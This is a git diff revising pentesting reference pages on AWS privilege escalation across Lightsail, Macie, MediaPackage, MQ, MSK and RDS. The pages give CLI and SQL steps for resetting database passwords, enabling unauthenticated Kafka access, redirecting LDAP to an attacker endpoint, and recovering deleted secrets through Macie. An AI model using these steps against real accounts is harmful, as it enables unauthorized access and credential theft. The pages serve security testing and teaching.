-    --domain-entry name=dev.example.com,type=A,target=192.0.2.0
+    --domain-entry id=<entry-id>,name=dev.example.com,type=A,target=192.0.2.0,isAlias=false
 ```
 
-**Potential Impact:** Takeover a domain
+**Potential Impact:** Domain/DNS hijacking or email impersonation, subject to DNS delegation and downstream validation.<sup>[[16]](#references)[[17]](#references)[[18]](#references)</sup>
+
+## References
+
+- [1] [How Amazon Lightsail works with IAM](https://docs.aws.amazon.com/lightsail/latest/userguide/security_iam_service-with-iam.html)
+- [2] [Control secure instance connectivity with Lightsail SSH keys](https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-managing-ssh-keys.html)
+- [3] [download-default-key-pair — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/download-default-key-pair.html)
+- [4] [get-instance-access-details — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/get-instance-access-details.html)
+- [5] [create-bucket-access-key — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/create-bucket-access-key.html)
+- [6] [get-relational-database-master-user-password — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/get-relational-database-master-user-password.html)
+- [7] [update-relational-database — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/update-relational-database.html)
+- [8] [open-instance-public-ports — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/open-instance-public-ports.html)
+- [9] [put-instance-public-ports — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/put-instance-public-ports.html)
+- [10] [set-resource-access-for-bucket — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/set-resource-access-for-bucket.html)
+- [11] [Control access to Lightsail buckets and objects](https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-understanding-bucket-permissions.html)
+- [12] [update-bucket — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/update-bucket.html)
+- [13] [update-container-service — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/update-container-service.html)
+- [14] [Grant Lightsail container services access to Amazon ECR private repositories](https://docs.aws.amazon.com/lightsail/latest/userguide/amazon-lightsail-container-service-ecr-private-repo-access.html)
+- [15] [create-domain-entry — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/create-domain-entry.html)
+- [16] [update-domain-entry — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/lightsail/update-domain-entry.html)
+- [17] [Create a DNS zone to manage domain records for Lightsail instances](https://docs.aws.amazon.com/lightsail/latest/userguide/lightsail-how-to-create-dns-entry.html)
+- [18] [RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email, Version 1](https://www.rfc-editor.org/info/rfc7208/)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-macie-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - Macie Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Macie
 
 For more information about Macie check:
@@ -12,27 +10,36 @@ For more information about Macie check:
 
 ### Amazon Macie - Bypass `Reveal Sample` Integrity Check
 
-AWS Macie is a security service that automatically detects sensitive data within AWS environments, such as credentials, personally identifiable information (PII), and other confidential data. When Macie identifies a sensitive credential, such as an AWS secret key stored in an S3 bucket, it generates a finding that allows the owner to view a "sample" of the detected data. Typically, once the sensitive file is removed from the S3 bucket, it is expected that the secret can no longer be retrieved.
+Amazon Macie is a data-security service that discovers sensitive data in S3 objects, including credentials and personally identifiable information (PII), and generates findings for detected data. Its sensitive-data-sample feature reads the affected object to reveal a limited sample of the data reported by a finding; using it requires access to the finding, the discovery result, the affected S3 object, and any required KMS key.<sup>[[1]](#references)[[2]](#references)</sup>
 
-However, a **bypass** has been identified where an attacker with sufficient permissions can **re-upload a file with the same name** but containing different, non-sensitive dummy data. This causes Macie to associate the newly uploaded file with the original finding, allowing the attacker to use the **"Reveal Sample" feature** to extract the previously detected secret. This issue poses a significant security risk, as secrets that were assumed to be deleted remain retrievable through this method.
+AWS's current documentation says that the affected object must still contain the same contents as when the finding was created and that Macie checks the object's ETag. If the object is unavailable or its contents changed, the documented API behavior is an `OBJECT_UNAVAILABLE` error.<sup>[[1]](#references)</sup>
 
-![flow](https://github.com/user-attachments/assets/7b83f2d3-1690-41f1-98cc-05ccd0154a66)
+In a February 2025 report, Raad Haddad described an observed behavior in which Macie returned samples from an old finding after the original S3 object had been deleted and replaced. The report describes this as a privilege-escalation path and warns that sensitive data could remain retrievable after removal.<sup>[[3]](#references)</sup> Because that observation conflicts with the current ETag/content-match requirement, treat the procedure below as a historical report and re-test it only in an authorized lab; by inference from the current documentation, replacing the object with dummy data should now make the samples unavailable.<sup>[[1]](#references)[[3]](#references)</sup>
 
-**Steps To Reproduce:**
+The reported sequence was: create a finding for an object, delete the object, upload different content under the same bucket and key, and request a sample from the old finding.<sup>[[3]](#references)</sup>
 
-1. Upload a file (e.g., `test-secret.txt`) to an S3 bucket with sensitive data, such as an AWS secret key. Wait for AWS Macie to scan and generate a finding.  
+**Historical Steps To Reproduce:**
 
-2. Navigate to AWS Macie Findings, locate the generated finding, and use the **Reveal Sample** feature to view the detected secret.  
+1. Upload a file (e.g., `test-secret.txt`) to an S3 bucket with sensitive data, such as an AWS secret key. Wait for AWS Macie to scan and generate a finding.<sup>[[3]](#references)</sup>
 
-3. Delete `test-secret.txt` from the S3 bucket and verify that it no longer exists.  
+2. Navigate to AWS Macie Findings, locate the generated finding, and use the **Reveal Sample** feature to view the detected secret.<sup>[[3]](#references)</sup>
 
-4. Create a new file named `test-secret.txt` with dummy data and re-upload it to the same S3 bucket using **attacker's account**.  
+3. Delete `test-secret.txt` from the S3 bucket and verify that it no longer exists.<sup>[[3]](#references)</sup>
 
-5. Return to AWS Macie Findings, access the original finding, and click **Reveal Sample** again.  
+4. Create a new file named `test-secret.txt` with dummy data and re-upload it to the same S3 bucket using the **attacker's account**.<sup>[[3]](#references)</sup>
 
-6. Observe that Macie still reveals the original secret, despite the file being deleted and replaced with different content **from different accounts, in our case it will be the attacker's account**.
+5. Return to AWS Macie Findings, access the original finding, and click **Reveal Sample** again.<sup>[[3]](#references)</sup>
+
+6. The historical report says that Macie still revealed the original secret, despite the file being deleted and replaced with different content **from different accounts, in this case the attacker's account**.<sup>[[3]](#references)</sup>
 
 **Summary:**
 
-This vulnerability allows an attacker with sufficient AWS IAM permissions to recover previously detected secrets even after the original file has been deleted from S3. If an AWS secret key, access token, or other sensitive credential is exposed, an attacker could leverage this flaw to retrieve it and gain unauthorized access to AWS resources. This could lead to privilege escalation, unauthorized data access, or further compromise of cloud assets, resulting in data breaches and service disruptions.
+If the reported behavior is reproducible, an attacker with the required Macie, S3, and KMS permissions could recover a previously detected secret after the original object was deleted. An exposed AWS secret key, access token, or other credential could then enable unauthorized access to AWS resources; the impact depends on the credential's permissions.<sup>[[1]](#references)[[3]](#references)</sup>
+
+## References
+
+- [1] [Retrieving sensitive data samples for a Macie finding](https://docs.aws.amazon.com/macie/latest/user/findings-retrieve-sd-proc.html)
+- [2] [What is Amazon Macie?](https://docs.aws.amazon.com/macie/latest/user/what-is-macie.html)
+- [3] [Raad Haddad - Found a New Privilege Escalation Path in Amazon Macie](https://www.linkedin.com/posts/raadhaddad_aws-security-redteam-activity-7297204731536461824-X8NF)
+
 {{#include ../../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc/README.md
@@ -1,10 +1,10 @@
 # AWS - Mediapackage Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
+The following MediaPackage actions appear in a reference list of AWS API calls that return credentials.<sup>[[1]](#references)</sup>
 
 ### `mediapackage:RotateChannelCredentials`
 
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
+Replaces the username and password on the channel's first IngestEndpoint. AWS marks this API as deprecated and recommends `RotateIngestEndpointCredentials` instead.<sup>[[2]](#references)[[4]](#references)</sup>
 
 ```bash
 aws mediapackage rotate-channel-credentials --id <value>
@@ -12,7 +12,7 @@ aws mediapackage rotate-channel-credentials --id <value>
 
 ### `mediapackage:RotateIngestEndpointCredentials`
 
-Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials)
+Generates replacement WebDAV credentials for the IngestEndpoint identified by `--ingest-endpoint-id`.<sup>[[3]](#references)[[5]](#references)</sup>
 
 ```bash
 aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63
@@ -20,10 +20,12 @@ aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-
 
 ## References
 
-- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+- [1] [AWS API calls that return credentials](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
+- [2] [Channels id Credentials - AWS Elemental MediaPackage](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html)
+- [3] [Channels id Ingest_endpoints ingest_endpoint_id Credentials - AWS Elemental MediaPackage](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html)
+- [4] [rotate-channel-credentials - AWS CLI Command Reference](https://docs.aws.amazon.com/goto/aws-cli/mediapackage-2017-10-12/RotateChannelCredentials)
+- [5] [rotate-ingest-endpoint-credentials - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/mediapackage/rotate-ingest-endpoint-credentials.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
 
 

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - MQ Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## MQ
 
 For more information about MQ check:
@@ -12,18 +10,18 @@ For more information about MQ check:
 
 ### `mq:ListBrokers`, `mq:CreateUser`
 
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
+With `mq:ListBrokers` to discover broker IDs and `mq:CreateUser`, an attacker can **create an ActiveMQ user** and optionally enable ActiveMQ Web Console access; these user-management APIs do not apply to RabbitMQ.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)[[8]](#references)</sup>
 
 ```bash
 aws mq list-brokers
 aws mq create-user --broker-id <value> --console-access --password <value> --username <value>
 ```
 
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
+**Potential Impact:** Access sensitive information through ActiveMQ, subject to the broker's group and destination authorization settings.<sup>[[2]](#references)</sup>
 
 ### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser`
 
-With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ):
+With `mq:ListUsers` and `mq:UpdateUser`, an attacker can **identify an existing ActiveMQ user, reset its password, and enable ActiveMQ Web Console access**; this updates an existing user rather than creating one and does not apply to RabbitMQ.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[5]](#references)[[8]](#references)[[9]](#references)</sup>
 
 ```bash
 aws mq list-brokers
@@ -31,23 +29,40 @@ aws mq list-users --broker-id <value>
 aws mq update-user --broker-id <value> --console-access --password <value> --username <value>
 ```
 
-**Potential Impact:** Access sensitive info navigating through ActiveMQ
+**Potential Impact:** Take over the selected user's access to queues, topics, or the ActiveMQ Web Console, subject to its existing group and authorization assignments.<sup>[[2]](#references)[[3]](#references)</sup>
+
+Amazon MQ applies user changes at the next maintenance window or broker reboot rather than immediately.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### `mq:ListBrokers`, `mq:UpdateBroker`
 
-If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**.
+If an ActiveMQ broker uses **LDAP authentication and authorization**, `mq:UpdateBroker` can submit replacement `ldapServerMetadata`, including the LDAP host(s), service-account credentials, and search parameters; this option does not apply to RabbitMQ.<sup>[[1]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 ```bash
 aws mq list-brokers
-aws mq update-broker --broker-id <value> --ldap-server-metadata=...
+aws mq update-broker --broker-id <value> \
+  --authentication-strategy LDAP \
+  --ldap-server-metadata file://ldap-server-metadata.json
 ```
 
-If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this).
+The `update-broker` request adds a pending broker configuration change, so the replacement LDAP settings may not take effect immediately.<sup>[[6]](#references)</sup>
 
-**Potential Impact:** Steal ActiveMQ credentials
+The broker uses the configured service account to connect to LDAP and performs authentication and authorization lookups through that connection. Amazon MQ connects to the supplied LDAP host over `ldaps://<host>:636` and does not support private-CA server certificates; replacing the host with an attacker-controlled endpoint can therefore redirect directory lookups and let that endpoint influence the results if its certificate satisfies TLS validation. This is an inference from the documented connection flow, not a claim that every client password or the previous LDAP service-account password is sent to the replacement server.<sup>[[7]](#references)</sup>
+
+If the original LDAP service-account credential is obtained separately, an attacker may also proxy requests to the legitimate directory while observing or modifying directory responses; the exact exposure depends on TLS validation and the broker's LDAP implementation.<sup>[[7]](#references)[[10]](#references)</sup>
+
+**Potential Impact:** Redirect or manipulate ActiveMQ's directory-backed authentication and authorization decisions.<sup>[[7]](#references)[[10]](#references)</sup>
+
+## References
+
+- [1] [API authentication and authorization for Amazon MQ](https://docs.aws.amazon.com/amazon-mq/latest/developer-guide/security-api-authentication-authorization.html)
+- [2] [Users - Amazon MQ](https://docs.aws.amazon.com/amazon-mq/latest/api-reference/brokers-broker-id-users.html)
+- [3] [User - Amazon MQ](https://docs.aws.amazon.com/amazon-mq/latest/api-reference/brokers-broker-id-users-username.html)
+- [4] [create-user - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/mq/create-user.html)
+- [5] [update-user - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/mq/update-user.html)
+- [6] [update-broker - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/mq/update-broker.html)
+- [7] [Integrating ActiveMQ brokers with LDAP - Amazon MQ](https://docs.aws.amazon.com/amazon-mq/latest/developer-guide/security-authentication-authorization.html)
+- [8] [list-brokers - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/mq/list-brokers.html)
+- [9] [list-users - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/mq/list-users.html)
+- [10] [Security - ActiveMQ](https://activemq.apache.org/components/classic/documentation/security)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - MSK Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## MSK
 
 For more information about MSK (Kafka) check:
@@ -10,18 +8,36 @@ For more information about MSK (Kafka) check:
 ../../aws-services/aws-msk-enum.md
 {{#endref}}
 
-### `msk:ListClusters`, `msk:UpdateSecurity`
+### `kafka:ListClusters`, `kafka:UpdateSecurity`
 
-With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them.
+Amazon MSK uses the `kafka` IAM service prefix: `kafka:ListClusters` lists clusters and `kafka:UpdateSecurity` updates a cluster's security settings. `kafka:UpdateSecurity` is the permission relevant to changing client authentication; AWS also lists `kms:RetireGrant` as a dependent action that may be needed for the request.<sup>[[1]](#references)</sup>
+
+With that permission, an identity can attempt to enable unauthenticated client access on an `ACTIVE` cluster. The operation requires the cluster ARN and current cluster version.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ```bash
-aws msk --client-authentication <value> --cluster-arn <value> --current-version <value>
+aws kafka update-security \
+  --cluster-arn <cluster-arn> \
+  --current-version <current-version> \
+  --client-authentication '{"Unauthenticated":{"Enabled":true}}'
 ```
 
-You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\
-If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it.
+A client still needs a network path to the brokers. For a private cluster, this generally means running in the cluster VPC or using VPC peering, Direct Connect, a Transit Gateway, or a VPN.<sup>[[4]](#references)</sup>
+
+Public access is a separate connectivity setting. AWS requires unauthenticated access to be off before public access can be enabled, so a public Provisioned cluster cannot use this unauthenticated-access path while it remains public; it must use SASL/IAM, SASL/SCRAM, or mTLS and satisfy the other public-access requirements.<sup>[[5]](#references)</sup>
+
+If a public cluster uses SASL/SCRAM, its sign-in credentials are stored in an associated AWS Secrets Manager secret. If you can read that secret, you can use those credentials to authenticate, but topic access still depends on Kafka ACLs and the cluster's network controls.<sup>[[6]](#references)[[5]](#references)[[8]](#references)</sup>
+
+If IAM access control is used, public reachability alone is not sufficient: Amazon MSK uses IAM for both authentication and authorization, and IAM policies must grant the Kafka data-plane actions needed for topic access. `kafka:UpdateSecurity` does not itself grant those `kafka-cluster:*` permissions.<sup>[[7]](#references)[[1]](#references)</sup>
+
+## References
+
+- [1] [Actions, resources, and condition keys for Amazon Managed Streaming for Apache Kafka](https://docs.aws.amazon.com/service-authorization/latest/reference/list_kafka.html)
+- [2] [Update security settings of an Amazon MSK cluster](https://docs.aws.amazon.com/msk/latest/developerguide/msk-update-security.html)
+- [3] [Updating Amazon MSK cluster security settings using the AWS CLI](https://docs.aws.amazon.com/msk/latest/developerguide/update-security-cli.html)
+- [4] [Access from within AWS but outside an MSK cluster's VPC](https://docs.aws.amazon.com/msk/latest/developerguide/aws-access.html)
+- [5] [Turn on public access to an MSK Provisioned cluster](https://docs.aws.amazon.com/msk/latest/developerguide/public-access.html)
+- [6] [How sign-in credentials authentication works](https://docs.aws.amazon.com/msk/latest/developerguide/msk-password-howitworks.html)
+- [7] [IAM access control](https://docs.aws.amazon.com/msk/latest/developerguide/iam-access-control.html)
+- [8] [Apache Kafka ACLs](https://docs.aws.amazon.com/msk/latest/developerguide/msk-acls.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc/README.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc/README.md
@@ -1,7 +1,5 @@
 # AWS - RDS Privesc
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## RDS - Relational Database Service
 
 For more information about RDS check:
@@ -12,7 +10,7 @@ For more information about RDS check:
 
 ### `rds:ModifyDBInstance`
 
-With that permission an attacker can **modify the password of the master user**, and the login inside the database:
+On a non-Aurora RDS DB instance, `rds:ModifyDBInstance` can change the master-user password, and `--apply-immediately` requests immediate application. This operation does not apply to Aurora, where the master password is managed by the DB cluster, and `MasterUserPassword` cannot be supplied when RDS manages that password in Secrets Manager.<sup>[[1]](#references)</sup>
 
 ```bash
 # Get the DB username, db name and address
@@ -29,13 +27,13 @@ psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>
 ```
 
 > [!WARNING]
-> You will need to be able to **contact to the database** (they are usually only accessible from inside networks).
+> You will need to be able to **contact to the database** (they are usually only accessible from inside networks).<sup>[[2]](#references)</sup>
 
 **Potential Impact:** Find sensitive info inside the databases.
 
 ### rds-db:connect
 
-According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) a user with this permission could connect to the DB instance.
+According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html), `rds-db:connect` is used only for IAM database authentication and its resource identifies a database account on a DB instance. IAM database authentication must also be enabled and the database user configured with the engine's IAM-authentication settings before the principal can connect with an authentication token.<sup>[[3]](#references)[[4]](#references)[[23]](#references)</sup>
 
 ### Abuse RDS Role IAM permissions
 
@@ -50,34 +48,34 @@ First you can check if this database has been used to access any other AWS servi
 SELECT * FROM pg_extension;
 ```
 
-If you find something like **`aws_s3`** you can assume this database has **some kind of access over S3** (there are other extensions such as **`aws_ml`** and **`aws_lambda`**).
+If you find something like **`aws_s3`** you can investigate whether this database has **some kind of access over S3** (there are other supported extensions such as **`aws_ml`** and **`aws_lambda`**). An installed extension alone does not establish that its IAM role can access a particular AWS resource.<sup>[[5]](#references)</sup>
 
-Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see there if the **cluster has any IAM Role attached** in the field **`AssociatedRoles`**. If any, you can assume that the database was **prepared to access other AWS services**. Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has.
+Also, if you have permissions to run **`aws rds describe-db-clusters`** you can see whether the **cluster has any IAM role attached** in the field **`AssociatedRoles`**. An active associated role can grant the cluster access to other AWS services, but the role status, trust policy, and permissions should be checked; the **name of the role** alone is not proof of access.<sup>[[12]](#references)</sup> Based on the **name of the role** (or if you can get the **permissions** of the role) you could **guess** what extra access the database has.
 
-Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+Now, to **read a file inside a bucket** you need to know the full path and a working IAM-role or credential-based S3 integration. Aurora PostgreSQL documents `aws_commons.create_s3_uri` and `aws_s3.table_import_from_s3` for this operation.<sup>[[6]](#references)[[7]](#references)</sup>
 
 ```sql
-// Create table
+-- Create table
 CREATE TABLE ttemp (col TEXT);
 
-// Create s3 uri
+-- Create s3 uri
 SELECT aws_commons.create_s3_uri(
-   'test1234567890678', // Name of the bucket
-   'data.csv',          // Name of the file
-   'eu-west-1'          //region of the bucket
+   'test1234567890678', -- Name of the bucket
+   'data.csv',          -- Name of the file
+   'eu-west-1'          -- region of the bucket
 ) AS s3_uri \gset
 
-// Load file contents in table
+-- Load file contents in table
 SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');
 
-// Get info
+-- Get info
 SELECT * from ttemp;
 
-// Delete table
+-- Delete table
 DROP TABLE ttemp;
 ```
 
-If you had **raw AWS credentials** you could also use them to access S3 data with:
+If you had **raw AWS credentials** you could also use them to access S3 data with the credentials parameter supported by `aws_s3.table_import_from_s3`:<sup>[[7]](#references)</sup>
 
 ```sql
 SELECT aws_s3.table_import_from_s3(
@@ -88,18 +86,18 @@ SELECT aws_s3.table_import_from_s3(
 ```
 
 > [!NOTE]
-> Postgresql **doesn't need to change any parameter group variable** to be able to access S3.
+> Postgresql **doesn't need to change any parameter group variable** to be able to access S3 when the documented extension and IAM-role or credential setup is complete.<sup>[[6]](#references)[[7]](#references)</sup>
 
 #### Mysql (Aurora)
 
 > [!TIP]
-> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**.
+> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you have an indicator of an **AWS Aurora MySQL db**.<sup>[[9]](#references)</sup>
 
-Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data.
+Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can investigate whether the database is prepared to access S3 data. The parameter names are used for Aurora MySQL S3 load and export integrations, and the associated IAM role and network permissions still need to be verified.<sup>[[8]](#references)[[10]](#references)</sup>
 
-Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services).
+Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which can enable access to AWS services when the role is active and the corresponding integration is configured.<sup>[[11]](#references)[[12]](#references)</sup>
 
-Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+Now, to **read a file inside a bucket** you need to know the full path and a configured Aurora MySQL S3 integration. You can read it with:<sup>[[8]](#references)</sup>
 
 ```sql
 CREATE TABLE ttemp (col TEXT);
@@ -110,18 +108,25 @@ DROP TABLE ttemp;
 
 ### `rds:AddRoleToDBCluster`, `iam:PassRole`
 
-An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
+An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **associate a specified IAM role with an existing Aurora DB cluster**. The cluster can then use that role for a configured database integration; the impact depends on the role's trust policy, permissions, and the engine-specific setup.<sup>[[11]](#references)[[13]](#references)[[14]](#references)</sup>
+
+Associating the role does not itself grant database access. To use the integration, the attacker also needs a database-authentication path and enough database privileges to execute the relevant SQL operation.<sup>[[7]](#references)[[8]](#references)[[11]](#references)</sup>
 
 ```bash
-aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>
+aws rds add-role-to-db-cluster \
+    --db-cluster-identifier <value> \
+    --role-arn <value> \
+    --feature-name <feature-name>
 ```
 
-**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\
-Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also.
+**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS DB cluster.\
+Note that some DBs require additional configuration. For example, Aurora MySQL requires the role to be associated with the cluster and the role ARN to be set in the relevant cluster parameter group for the integration.<sup>[[8]](#references)[[11]](#references)</sup>
 
 ### `rds:CreateDBInstance`
 
-Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet:
+With `rds:CreateDBInstance`, an attacker could create a **new instance inside an existing Aurora cluster** that already has an **IAM role** attached. This path relies on the cluster-level role and does not change the Aurora master password; the new instance might be exposed to the internet if public-access, subnet, internet-gateway, and security-group requirements are met.<sup>[[2]](#references)[[15]](#references)[[16]](#references)</sup>
+
+Creating or exposing the instance does not bypass database authentication. The attacker still needs valid database credentials or a configured IAM database-authentication path, and network security groups must permit the connection.<sup>[[2]](#references)[[3]](#references)[[4]](#references)[[16]](#references)</sup>
 
 ```bash
 aws --region eu-west-1 --profile none-priv rds create-db-instance \
@@ -129,7 +134,7 @@ aws --region eu-west-1 --profile none-priv rds create-db-instance \
     --db-instance-class db.t3.medium \
     --engine aurora-postgresql \
     --db-cluster-identifier database-1 \
-    --db-security-groups "string" \
+    --db-subnet-group-name <db-subnet-group> \
     --publicly-accessible
 ```
 
@@ -138,27 +143,44 @@ aws --region eu-west-1 --profile none-priv rds create-db-instance \
 > [!NOTE]
 > TODO: Test
 
-An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance.
+Unlike the Aurora example above, `--custom-iam-instance-profile` is an RDS Custom parameter. With the permissions `rds:CreateDBInstance` and `iam:PassRole`, an attacker who also satisfies the RDS Custom prerequisites can **create an RDS Custom instance with a specified IAM instance profile attached**. The impact depends on the profile's role permissions and the RDS Custom configuration.<sup>[[14]](#references)[[15]](#references)[[18]](#references)</sup>
+
+Creating the instance does not automatically expose the instance-profile credentials. Exploitation additionally requires a supported way to execute code on or obtain administrative access to the RDS Custom host.<sup>[[18]](#references)</sup>
 
 > [!WARNING]
-> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)):
+> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)):<sup>[[15]](#references)</sup>
 
 > - The profile must exist in your account.
 > - The profile must have an IAM role that Amazon EC2 has permissions to assume.
 > - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` .
 
 ```bash
-aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole
+aws rds create-db-instance \
+    --engine custom-oracle-ee-cdb \
+    --db-instance-identifier malicious-instance \
+    --engine-version 19.cdb_cev1 \
+    --db-name MYPDB \
+    --db-system-id MYCDB \
+    --allocated-storage 250 \
+    --db-instance-class db.m5.xlarge \
+    --db-subnet-group-name <db-subnet-group> \
+    --master-username admin \
+    --master-user-password 'mypassword' \
+    --backup-retention-period 3 \
+    --port 8200 \
+    --kms-key-id <kms-key-id> \
+    --no-auto-minor-version-upgrade \
+    --custom-iam-instance-profile AWSRDSCustomInstanceProfile-<region>
 ```
 
 **Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
 
 ### `rds:AddRoleToDBInstance`, `iam:PassRole`
 
-An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
